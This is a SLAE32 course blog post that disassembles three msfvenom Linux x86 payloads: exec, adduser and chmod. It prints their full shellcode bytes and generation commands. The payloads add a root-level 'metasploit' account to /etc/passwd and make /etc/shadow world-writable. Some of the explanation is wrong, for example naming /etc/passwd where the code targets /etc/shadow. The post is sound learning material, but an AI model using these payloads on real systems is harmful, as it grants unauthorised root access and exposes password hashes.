---
title: "SLAE32 0x05: msfvenom Shellcode Analysis"
date: 2019-11-09
category: [SLAE32]
tags: [assembly, exploit development, msfvenom, linux, SLAE32]
header:
    teaser: "/assets/images/slae/venom.jpg"
---
The tool `msfvenom` is commonly used to generate payloads. The tool provides a variety of payload options for different operating systems and architectures. Analyzing shellcode payloads generated by `msfvenom` is a useful exercise to help better understand the underlying techniques that are at play within these payloads.

Some of the most common shellcode payloads encountered are bind and reverse shells. As bind and reverse shell shellcodes have been created and analyzed in depth in previous posts, three unique shellcodes were selected for analysis in this post. The sections below will dissect and explain the shellcodes generated by `msfvenom` for the `linux/x86/exec` payload, the `linux/x86/adduser` payload, and the `linux/x86/chmod` payload. When applicable, the assembly instructions will come first, followed by an explanation of the purpose of the instructions.

## Objectives
Analyze at least 3 shellcode samples created using `msfvenom` for linux/x86;
1. Use GDB/ndisasm/libemu to dissect the functionality of the shellcode
2. Present the analysis

## Shellcode I: exec
### Shellcode I: Explanation
The `exec` payload includes insturctions that will execute a specified command on the target system. The `exec` shellcode was generated using the `msfvenom` command shown below.

```shell
root@kali:~/SLAE/assignment-5# msfvenom -p linux/x86/exec CMD=id -f c
```

The shellcode is generated with the command of `id` specified. This means that upon successful execution of the shellcode, the output of the `id` command will be printed to the terminal.

Using the shellcode generated by the `msfvenom` command, a good portion of the correct assembly instructions can be viewed using the `ndisasm` tool. The `ndisasm` tool disassembles the shellcode bytes into more easily readable assembly operation codes and their respective instructions. The command used to accomplish this is shown below.

```shell
root@kali:~/SLAE/assignment-5# echo -ne "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\
xe3\x52\xe8\x03\x00\x00\x00\x69\x64\x00\x57\x53\x89\xe1\xcd\x80" | ndisasm -b 32 -p intel -
```

The command line arguments passed to `ndisasm` specify `x86` (32 bit) architecture and that the output should be formatted in the Intel format. The output of the above command in its entirety is shown below. Note that some assembly instructions are not accurate, specifically instructions following `CALL` instructions. The output will be broken down in to smaller sections later on.

```nasm
00000000  6A0B              push byte +0xb                            
00000002  58                pop eax                                  
00000003  99                cdq    
00000004  52                push edx                                  
00000005  66682D63          push word 0x632d                          
00000009  89E7              mov edi,esp                              
0000000B  682F736800        push dword 0x68732f                      
00000010  682F62696E        push dword 0x6e69622f                    
00000015  89E3              mov ebx,esp                              
00000017  52                push edx                                  
00000018  E803000000        call 0x20                                
0000001D  696400575389E1CD  imul esp,[eax+eax+0x57],dword 0xcde18953  
00000025  80                db 0x80  
```

### Shellcode I: Analysis
```nasm
00000000  6A0B              push byte +0xb                            
00000002  58                pop eax  
```

First, a single byte `0xb` is pushed to the stack. The hexadecimal value `0xb` in decimal is `11`. From the `unistd_32.h` file, `11` specifies the `execve` system call. The `0xb` byte is transferred to the `EAX` register using the `POP EAX` instruction. Ulitmately, the value `0xb` will be passed through the `EAX` register to a software interrupt which will result in the execution of the `execve` system call.

```shell
#define __NR_execve 11
```

The `execve` system call expects three arguments, as shown below. As usual, the first argument will be passed through `EBX`, the second through `ECX`, and the third through `EDX`.

```shell
int execve(const char *pathname, char *const argv[], char *const envp[]);
```

```nasm
00000003  99                cdq
00000004  52                push edx  
```

Next, the `CDQ` instruction is used to zero out the `EDX` register. This is accomplished through the functionality of `CDQ`. The `CDQ` instruction copies the sign bit in the `EAX` register to every bit position in the `EDX` register. Since the sign bit is not set in `EAX`, its value is `0`. This means that `0` will be copied to every bit position in the `EDX` register, thus zeroing out the register. A `PUSH` instruction is used to store `EBX` on the stack which will act as a null terminator for various arguments passed to `execve`.

```nasm
00000005  66682D63          push word 0x632d
00000009  89E7              mov edi,esp
```

Now, a `PUSH` instruction is used to store `0x632d` on the stack. Examining this value reveals that the value correlates to the `c-` string, or `-c` in reverse order.

```shell
>>> print('\x63\x2d')                                          
c-
```

 The memory address in `ESP` which points to the top of the stack and contains the `-c` string is moved into the `EDI` register. This memory address which contains the null-terminated `-c` string will later be used as part of the array of pointers that contain command line arguments passed through `ECX` to `execve` as its second argument.

```nasm
0000000B  682F736800        push dword 0x68732f                      
00000010  682F62696E        push dword 0x6e69622f                    
00000015  89E3              mov ebx,esp  
```                            

Two `PUSH` instructions are used to store first `0x68732f` and then `0x6e69622f` on the stack. Upon examining these hexidecimal values, it is revealed that these values correlate to the string `/bin/sh`.

```shell
>>> print('\x68\x73\x2f\x6e\x69\x62\x2f') 
hs/nib/
```

The memory address of `ESP` is moved into the `EBX` register which will be passed to `execve` as the first argument which is a pointer to the pathname of the program to be executed, `/bin/sh`.

```nasm
00000017  52                push edx
00000018  E803000000        call 0x20
```

As the `EDX` register at this point is still clear as a result of the previous `CDQ` instruction, the `PUSH EDX` instruction pushes four null bytes to the stack. These bytes will act as a delimiter for the array of memory addresses that will be passed through `ECX` as the second argument to `execve`.

In this case, the `CALL 0x20` instruction serves two purposes. The first purpose is to direct execution flow elsewhere in the shellcode (specifically to the memory address `32` bytes (decimal `32` is `0x20` in hex) from the start of the shellcode) and the second purpose is to store a memory address on the stack. As part of the functionality built in to the `CALL` instruction, the memory address of the instruction following the `CALL` instruction will be stored on the stack so that once the called function completes, execution flow can retun to the next instruction. 

```nasm
0000001D  696400575389E1CD  imul esp,[eax+eax+0x57],dword 0xcde18953  
00000025  80                db 0x80  
```

In this example, the memory address pushed to the stack as a result of the call instruction is the memory address of `0000001D`. In decimal, this memory address value can be represented as `29`. The first two bytes stored at this memory address are `0x6964`. Examining these bytes reveals that these bytes correlate to the string `id`, or the command that was chosen to be excuted by `execve` when the payload was generated with `msfvenom`.

```shell
>>> print('\x69\x64')
id
```

Following these two bytes is a null byte to terminate the `id` string.

Recall that the `CALL 0x20` instruction will redirect execution flow to `0x20` bytes in hex or `32` bytes in decimal from the start of the shellcode. As mentioned previously, `0000001D` correlates to decimal `29`. After taking into account the three bytes `0x696400` that form the null terminated `id` string, this means that the `CALL 0x20` instruction will result in execution flow being redirected to the instructions that directly follow the `0x696400` bytes at the `00000020` (decimal `32`) memory address. In other words, the instructions represented by  the shellcode `\x57\x53\x89\xe1\xcd\x80` will now be executed.

Using `ndisasm` again to disassemble this shellcode reveals the following:

```shell
root@kali:~/SLAE/assignment-5# echo -ne "\x57\x53\x89\xe1\xcd\x80" | ndisasm -b 32 -p intel -                                          
00000000  57                push edi
00000001  53                push ebx
00000002  89E1              mov ecx,esp
00000004  CD80              int 0x80
```

These `PUSH` instructions serve the purpose to complete the array of pointers to strings which will be passed as the second argument to `execve` through `ECX`. The memory addresses in the array must be passed in reverse order, and the memory address that contains `id` is already on the stack as a result of the `CALL 0x20` earlier. The `PUSH EDI` instuction pushes the memory address in `EDI` to the stack which contains the `-c` string. The `PUSH EBX` command pushes the memory address in `EBX` to the stack which contains the `/bin/sh` string. Therefor, there are now three memory address on the stack. The memory address on the top of the stack contains `/bin/sh`,  the second memory address contains `-c`, and the third memory address contains `id`. The memory address in `ESP` points to these memory addresses and is moved into `ECX` before the software interrupt `INT 0x80` occurs, which results in the `/bin/sh -c id` command being executed by `execve`. 

## Shellcode II: adduser
### Shellcode II: Explanation
The `adduser` payload includes instructions to add a user to the target system with the UID of 0. The `adduser` shellcode was generated using the `msfvenom` command shown below.

```shell
root@kali:~/SLAE/assignment-5# msfvenom -p linux/x86/adduser -f c
```

The shellcode is generated using default parameters. In this case, the user that will be added to the target system will be called `metasploit`. Since no password was provided, the default password will be used.

Once again, the `ndisasm` tool disassembles the shellcode bytes into more easily readable assembly operation codes and their respective instructions. The command used to accomplish this is shown below.

```shell
root@kali:~/SLAE/assignment-5# echo -ne "\x31\xc9\x89\xcb\x6a\x46\x58\xcd\x80\x6a\x05\x58\x31\xc9\x51\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\        
x68\x2f\x65\x74\x63\x89\xe3\x41\xb5\x04\xcd\x80\x93\xe8\x28\x00\x00\x00\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x3a\x41\x7a\x2f\x64\x49\x73\x6a\x34\x70\x34\x49\x52\x63\x3a\x30\x3a\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x0a\x59\x8b\x51\xfc\x6a\x04\x58\xcd\x80\x6a\x01\x58\xcd\x80" | ndisasm -b 32 -p intel -
```

The command line arguments passed to `ndisasm` specify `x86` (32 bit) architecture and that the output should be formatted in the Intel format. The output of the above command in its entirety is shown below. Note that some assembly instructions are not accurate, specifically instructions following `CALL` instructions. The output will be broken down in to smaller sections later on.

```nasm
00000000  31C9              xor ecx,ecx
00000002  89CB              mov ebx,ecx
00000004  6A46              push byte +0x46
00000006  58                pop eax
00000007  CD80              int 0x80
00000009  6A05              push byte +0x5
0000000B  58                pop eax
0000000C  31C9              xor ecx,ecx
0000000E  51                push ecx
0000000F  6873737764        push dword 0x64777373
00000014  682F2F7061        push dword 0x61702f2f
00000019  682F657463        push dword 0x6374652f
0000001E  89E3              mov ebx,esp
00000020  41                inc ecx
00000021  B504              mov ch,0x4
00000023  CD80              int 0x80
00000025  93                xchg eax,ebx
00000026  E828000000        call 0x53
0000002B  6D                insd
0000002C  657461            gs jz 0x90
0000002F  7370              jnc 0xa1 
00000031  6C                insb
00000032  6F                outsd
00000033  69743A417A2F6449  imul esi,[edx+edi+0x41],dword 0x49642f7a
0000003B  736A              jnc 0xa7
0000003D  3470              xor al,0x70
0000003F  3449              xor al,0x49
00000041  52                push edx
00000042  633A              arpl [edx],di
00000044  303A              xor [edx],bh
00000046  303A              xor [edx],bh
00000048  3A2F              cmp ch,[edi]
0000004A  3A2F              cmp ch,[edi]
0000004C  62696E            bound ebp,[ecx+0x6e]
0000004F  2F                das
00000050  7368              jnc 0xba
00000052  0A598B            or bl,[ecx-0x75]
00000055  51                push ecx
00000056  FC                cld
00000057  6A04              push byte +0x4
00000059  58                pop eax
0000005A  CD80              int 0x80
0000005C  6A01              push byte +0x1
0000005E  58                pop eax 
0000005F  CD80              int 0x80
``` 

### Shellcode II: Analysis
```nasm
00000000  31C9              xor ecx,ecx
00000002  89CB              mov ebx,ecx
00000004  6A46              push byte +0x46
00000006  58                pop eax
00000007  CD80              int 0x80
```

To start, an `XOR` instruction is used to zero out the `ECX` register. As explained in previous posts, using `XOR` with the same source and destination register will result in zeroing out the register. Following the `XOR` instruction, the recently-cleared `ECX` register is moved to the `EBX` register, effectively zeroing out the `EBX` register. Next, a single byte `0x46` is pushed to the stack and then stored in `EAX` using a `POP` instruction. The hex value `0x46` in decimal is `70`. From the `unistd_32.h` file, `70` specifies the `setreuid` system call.

```shell
#define __NR_setreuid 70
```

From `man 2 setreuid`, the `setreuid` function sets real and effective user IDs of the calling process and takes two arguments, as shown below.

```shell
int setreuid(uid_t ruid, uid_t euid);
```
The two arguments that will be passed to the `setreuid` system call via the `EBX` and `ECX` registers will both be `0` as a result of the previously mentioned `XOR` and `MOV` instructions related to the `EBX` and `ECX` registers. 

On Linux systems, `UID 0` is assigned to and represents the `root` user of the system that has unrestricted super administrator privileges. Underprivileged users usually do not have the permissions required to add users to Linux systems, but if an underpriveleged user has access to a program/process running as root or a program with the `SUID` bit set, then `setreuid` would ensure that the remaining shellcode within the payload will be run with `root` permissions. 

```nasm
00000009  6A05              push byte +0x5
0000000B  58                pop eax
```

Next, the byte `0x5` is pushed to the stack and then stored in `EAX` using `POP`. The integer `5` specifies the `open` system call in the `unistd_32.h` file. 

```shell
#define __NR_open 5
```

From `man 2 open`, the `open` function expects two arguments and serves the purpose of opening the file specified by the first argument with the desired access mode specifed by the second argument. The return value of `open` is a file descriptor that can be used in subsequent system calls and is returned in the `EAX` register function completion.

```shell
int open(const char *pathname, int flags);
```

Furthermore, the second argument specifies whether the opened file is opened as `O_RDONLY`, `O_WRONLY`, or `O_RDWR` which correlate to read-only, write-only, and read-write access modes. In addition to the access mode flags, zero or more bitwise file creation and file status flags can be set within the second argument that further modify the behavior of `open`. 

```nasm
0000000C  31C9              xor ecx,ecx
0000000E  51                push ecx
0000000F  6873737764        push dword 0x64777373
00000014  682F2F7061        push dword 0x61702f2f
00000019  682F657463        push dword 0x6374652f
0000001E  89E3              mov ebx,esp
```

The `ECX` register is zeroed out once again with the `XOR` instruction and then is pushed to the stack with a `PUSH` instruction. These null bytes serve to terminate the string which is subsequently pushed to the stack. Examining the twelve bytes pushed to the stack by the three `PUSH` instructions reveals that the bytes correlate to the `/etc//passwd` string and will specify that `open` should open the `/etc/passwd` file.

```shell
>>> print('\x64\x77\x73\x73\x61\x70\x2f\x2f\x63\x74\x65\x2f')
dwssap//cte/
```

The `MOV EBX, ESP` instruction serves to store the pointer to the `/etc//passwd` pathname string which will later be passed to `open` as its first argument via the `EBX` register.

```nasm
00000020  41                inc ecx                                          
00000021  B504              mov ch,0x4                                        
00000023  CD80              int 0x80
```

An `INC ECX` instruction is used to increase the value in `ECX` by one to hexadecimal `0x1`. Next, the hexadecimal value `0x4` is moved into the `CH` register. The `CH` register represents the 8 bits that make up the second-to-least significant byte. A representation of the `ECX` register in binary is shown below. 

```shell
31             16 | 15     8 | 7      0
---------------------------------------
00000000 00000000 | 00000100 | 00000001
---------------------------------------
```

Recall that additional bitwise file creation and file status flags can be set within the second argument argument of `open`. At this point, the `CX` register contains the value `0x0401` because of the `INC ECX` and `MOV CH, 0x4` instructions. This means that of the 16 bits present in the `CX` register, the lowest order bit (the 0th bit, decimal `2^0 = 1`) and the 10th-lowest order bit (the 10th bit, decimal `2^10 = 1024`) are set. In octal, decimal `1` is `00000001` and decimal `1024` is `00002000`. As seen in the `/usr/include/asm-generic/fcntl.h` file, octal `00000001` specifies the file access mode as `O_WRONLY` which correlates to write-only mode, and octal `00002000` specifies the file status flag `O_APPEND`. This means that once the software interrupt `INT 0x80` instruction is executed, the `/etc/passwd` file will be opened with write access and any written information will be appended to the information already present in the file.

```nasm
00000025  93                xchg eax,ebx
00000026  E828000000        call 0x53
```

After the `open` function, the file descriptor that references the opened file is stored in `EAX`. The `XCHG EAX, EBX` serves to swap the values stored within `EAX` and `EBX`. Therefore, `EBX` now holds the file descriptor returned by `open`. The `CALL 0x53` instruction is used in the same manner as previously explained in the analysis of the `exec` payload. In short, the memory address of the next instruction (`0000002B`) is stored on the stack and execution flow is redirected to the instructions present at `0x53` bytes from the start of the shellcode.

```nasm
0000002B  6D                insd
0000002C  657461            gs jz 0x90
0000002F  7370              jnc 0xa1
00000031  6C                insb
00000032  6F                outsd
00000033  69743A417A2F6449  imul esi,[edx+edi+0x41],dword 0x49642f7a
0000003B  736A              jnc 0xa7
0000003D  3470              xor al,0x70
0000003F  3449              xor al,0x49
00000041  52                push edx
00000042  633A              arpl [edx],di
00000044  303A              xor [edx],bh
00000046  303A              xor [edx],bh
00000048  3A2F              cmp ch,[edi]
0000004A  3A2F              cmp ch,[edi]
0000004C  62696E            bound ebp,[ecx+0x6e]
0000004F  2F                das
00000050  7368              jnc 0xba
00000052  0A598B            or bl,[ecx-0x75]
```

Converting the contents present between the memory address `0000002B` and `00000053` (where execution flow will continue as a result of the previous `CALL 0x53` instruction) to ASCII reveals the following:

```shell
>>> print('\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x3a\x41\x7a\x2f\x64\x49\x73\x6a\x34\x70\x34\x49\x34\x49\x52\x63\x3a\x30\x3a\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x73\x68')          
metasploit:Az/dIsj4p4I4IRc:0:0::/:/bin/sh
```

This string specifies the contents that will ultimately be written to the `/etc/passwd` file and is in the same format as other entries in the `/etc/passwd` file. As the `adduser` payload was generated with default parameters, the user that will be added to the `/etc/passwd` file is called `metasploit`, the password for the user will be `Az/dIsj4p4I4IRc`, the user will have a user identifier number of `0`, a group identifier number of `0`, and will use `/bin/sh` as a default shell.

Using `ndisasm` once again to analyze the instructions present at `00000053` where execution flow has been redirected by `CALL 0x53` shows the following:

```shell
root@kali:~/SLAE/assignment-5# echo -ne "\x59\x8b\x51\xfc\x6a\x04\x58\xcd\x80\x6a\x01\x58\xcd\x80" | ndisasm -b 32 -p intel -
00000000  59                pop ecx
00000001  8B51FC            mov edx,[ecx-0x4]
00000004  6A04              push byte +0x4
00000006  58                pop eax
00000007  CD80              int 0x80
```

The `POP ECX` instruction stores the `metasploit:Az/dIsj4p4I4IRc:0:0::/:/bin/sh` string in `ECX`. The instruction `MOV EDX, [ECX-0x4]` is used to move the value `0x28` into `EDX`. Since `ECX` now contains the memory address `0000002B` from the original `ndisasm` output, the `MOV EDX, [ECX-0x4]` instruction will result in the contents present at memory address `00000027` from the same output being stored in `EDX`. It can be seen below that the value `0x28` is present at `00000027` in the original `ndisasm` output as part of the operation code for the previously explained `CALL 0x53` instruction.

```nasm
00000026  E828000000        call 0x53
```

Continuing on, the byte `0x4` is pushed to the stack and subsequently stored in `EAX` using a `POP` instruction. From the `unistd_32.h` file, `4` specifies the `write` system call. The arguments expected by `write` are shown below.

```shell
ssize_t write(int fd, const void *buf, size_t count);
```

From `man 2 write`, the `write` function will write up to `count` bytes from the buffer starting at `buf` to the file referenced by the file descriptor `fd`. The `EBX`, `ECX`, and `EDX` registers have already been set to contain the file descriptor `fd` as returned by `open` that represents the `/etc/passwd` file, a pointer to the string `metasploit:Az/dIsj4p4I4IRc:0:0::/:/bin/sh` in memory as `buf`, and the length of the string `0x28` as `count`, respsectively. The software interrupt `INT 0x80` will call the `write` system call which will add the `metasploit` user to the `/etc/passwd` file as previously explained. 

```nasm
00000009  6A01              push byte +0x1
0000000B  58                pop eax
0000000C  CD80              int 0x80
```

To wrap up, the byte `0x1` is pushed to the stack and stored in `EAX` by `POP`. In `unistd_32.h`, the value `1` specifies the `exit` system call. There are no necessary arguments for `exit`. The software interrupt `INT 0x80` results in the process in which the shellcode is being run to exit gracefully.

## Shellcode III: chmod
### Shellcode III: Explanation
The `chmod` payload includes instructions to change permissions on a specified file. The `chmod` shellcode was generated using the `msfvenom` command shown below.

```shell
root@kali:~/SLAE/assignment-5# msfvenom -p linux/x86/chmod -f c
```

The shellcode is generated using default parameters. In this case, the permissions of the `/etc/shadow` file will be set to `0666`. This means that the file will be world readble and world writeable. 

As mentioned previously, the `ndisasm` tool disassembles the shellcode bytes into more easily readable assembly operation codes and their respective instructions. The command used to accomplish this is shown below.

```shell
root@kali:~/SLAE/assignment-5# echo -ne "\x99\x6a\x0f\x58\x52\xe8\x0c\x00\x00\x00\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77\x00\x5b\x68\xb6\x01\x00\x00\x59\xcd\x80\x6a\x01\x58\xcd\x80" | ndisasm -b 32 -p intel -
```

The command line arguments passed to `ndisasm` specify `x86` (32 bit) architecture and that the output should be formatted in the Intel format. The output of the above command in its entirety is shown below. Note that some assembly instructions are not accurate, specifically instructions following `CALL` instructions. The output will be broken down in to smaller sections later on.

```nasm
00000000  99                cdq
00000001  6A0F              push byte +0xf
00000003  58                pop eax
00000004  52                push edx
00000005  E80C000000        call 0x16
0000000A  2F                das
0000000B  657463            gs jz 0x71
0000000E  2F                das
0000000F  7368              jnc 0x79
00000011  61                popa
00000012  646F              fs outsd
00000014  7700              ja 0x16
00000016  5B                pop ebx
00000017  68B6010000        push dword 0x1b6
0000001C  59                pop ecx
0000001D  CD80              int 0x80
0000001F  6A01              push byte +0x1
00000021  58                pop eax
00000022  CD80              int 0x80
```

### Shellcode III: Analysis
```nasm
00000000  99                cdq
00000001  6A0F              push byte +0xf
00000003  58                pop eax
```

First, a `CDQ` instruction is used to zero out the `EDX` register in the same manner previously outlined in the `exec` payload. To reiterate, the CDQ instruction copies the sign bit in the `EAX` register to every bit position in the `EDX` register. Since the sign bit is not set in `EAX`, its value is `0`. This means that `0` will be copied to every bit position in the `EDX` register, thus zeroing out the register.

A single byte `0xf` (or `15` in decimal) is pushed to the stack and subsequently stored in the `EAX` register with a `POP` instruction. From the `unistd_32.h` file, `15` specifies the `chmod` system call, which makes sense for this particular payload.

```shell
#define __NR_chmod 15
```

From `man 2 chmod`, the `chmod` function expects two arguments, as shown below.

```shell
int chmod(const char *pathname, mode_t mode);
```

The first argument expected by `chmod` is a pointer to a pathname string which will specify the file to be modified and will be passed to `chmod` through the `EBX` register. The second argument expected by `chmod` is a mode value (an octal value, as commonly seen in command line usage of `chmod`) and is passed to `chmod` through the `ECX` register.

```nasm
00000004  52                push edx
00000005  E80C000000        call 0x16
```

Here, a `PUSH EDX` instruction is used to push four NULL bytes to the stack which will serve as a delimiter for the pathname argument for `chmod`. As explained in the two previous shellcode payloads, a `CALL` command is used to store a string on the stack and to redirect execution flow to the memory address specified in the `CALL` instruction (`0x16` in this case).

```nasm
0000000A  2F                das
0000000B  657463            gs jz 0x71
0000000E  2F                das
0000000F  7368              jnc 0x79
00000011  61                popa
00000012  646F              fs outsd
00000014  7700              ja 0x16
```

As a result of the `CALL 0x16` instruction, the bytes shown above will be stored on the stack beginning at the memory address `0000000A`. Further analysing these bytes reveals that the bytes correlate to the string shown below.

```shell
>>> print('\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77')
/etc/shadow
```

From this, it is clear that the file that will be modified by the `chmod` function will be the `/etc/passwd` file.

```nasm
00000016  5B                pop ebx
00000017  68B6010000        push dword 0x1b6
0000001C  59                pop ecx
0000001D  CD80              int 0x80
```

The `CALL 0x16` instruction mentioned previously results in execution flow being redirected to the memory address located `0x16` bytes from the beginning of the shellcode which contains the operation codes shown above.

As the memory address `0000000A` contains the string `/etc/shadow` and is currently stored on the top of the stack, the `POP EBX` command will result in the memory address containing the aformentioned `/etc/shadow` string being stored in the `EBX` register. This will soon be passed as the pointer to a pathname for the first argument expected by `chmod`.

Next, the value `0x1b6` is pushed to the stack and subsequently stored in `ECX` by a `POP` instruction. The hexadecimal value `0x1b6` converted to its corresponding octal value (as commonly used in command line usage of `chmod`) is `0o666`. As expected, this would suggest that the `r` (read) and `w` (write) bits will be set for the owner of the `/etc/passwd` file, users in the group to which the `/etc/passwd` file belongs, as well as to all other users. In other words, the `/etc/passwd` file will be world readable and world writeable after once its mode is changed by `chmod`. A software interrupt `INT 0x80` instruction calls `chmod` with the described arguments.

```nasm
0000001F  6A01              push byte +0x1
00000021  58                pop eax
00000022  CD80              int 0x80
```

As explained in the `adduser` payload, the byte `0x1` is pushed to the stack and stored in `EAX` by `POP`. In `unistd_32.h`, the value `1` specifies the `exit` system call. There are no necessary arguments for `exit`. The software interrupt `INT 0x80` results in the process in which the shellcode is being run to exit gracefully.

_This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:∏

<http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert>

_Student ID: SLAE-1469_

